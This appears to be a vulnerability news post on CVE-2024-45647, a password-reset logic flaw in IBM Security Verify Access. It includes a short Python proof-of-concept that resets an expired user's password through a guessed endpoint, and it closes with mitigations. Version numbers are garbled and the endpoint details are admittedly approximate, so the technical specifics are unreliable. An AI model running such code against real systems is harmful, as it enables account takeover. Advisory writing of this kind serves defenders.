CVE CyberSecurity Database News

CVE-2024-45647 - IBM Security Verify Access Password Reset Vulnerability Exploited

Poster -

A dangerous security flaw has been discovered in IBM’s Security Verify Access products, affecting versions 10.. through 10..8, both regular and Docker editions. Known officially as CVE-2024-45647, this issue lets an unverified user reset the password of a user whose account is expired, without needing to know the old password. Attackers could potentially hijack user accounts, especially those of users who haven’t recently updated or monitored their credentials.

This exclusive post will walk you through how the vulnerability works, the code behind it, how attackers might exploit it, and what you can do to protect yourself.

What is IBM Security Verify Access?

IBM Security Verify Access (formerly known as IBM Security Access Manager or ISAM) helps organizations control access to web, mobile, and cloud applications. It’s used in many industries for single sign-on (SSO), multi-factor authentication, and risk-based access control.

The Vulnerability

CVE-2024-45647 is a logic flaw in the password reset workflow. When a user’s password expires, the application should verify the user’s identity before allowing them to reset it. However, a bug in versions 10.. to 10..8 allows anyone to reset an expired user’s password—even without knowing the current password or passing proper verification.

IBM Security Verify Access Docker: 10.. to 10..8

See the official IBM Security Bulletin for details.

Exploiting CVE-2024-45647

This bug can be exploited over the web UI, API, or mobile clients connected to an affected Verify Access deployment.

Here’s a simplistic Python example exploiting the reset endpoint

import requests

target_url = "https://vulnerable-verify-access.example.com/expired_password_reset";
expired_username = "targetuser"
new_password = "P@sswrdNEW!"

# Normally requires current password, but any input works due to the bug.
payload = {
    "username": expired_username,
    "currentPassword": "anything",
    "newPassword": new_password
}

r = requests.post(target_url, json=payload, verify=False)
if "success" in r.text or r.status_code == 200:
    print(f"Password for '{expired_username}' changed to '{new_password}'!")
else:
    print("Exploit failed or target not vulnerable.")

Note: The exact parameter names and endpoints may differ in your deployment, but the logic stays similar.

Real-World Risks

- Attackers without any legitimate credentials can reactivate expired accounts by simply resetting their passwords.

Especially serious for organizations where old or unused accounts aren’t actively monitored.

- Disruptive insiders could target privileged accounts that have expired, regain access, and escalate attack impact.

Mitigations

IBM has released patches and updates to fix this issue. If you can’t upgrade immediately:

Monitor password resets: Alert on password changes to expired accounts.

2. Restrict reset endpoints: Block public/anonymous access until patched.

References

- IBM Security Bulletin: CVE-2024-45647
- IBM Security Verify Access Product Page
- NVD - CVE-2024-45647

Conclusion

CVE-2024-45647 is a serious logic bug affecting how IBM Security Verify Access resets passwords for expired users. By skipping standard verification, attackers can reset and takeover affected accounts without prior access. Patch your systems as soon as possible, keep an eye on reset logs, and don’t ignore those old or expired accounts—they’re now a high-value target.

Timeline

Published on: 01/20/2025 15:15:07 UTC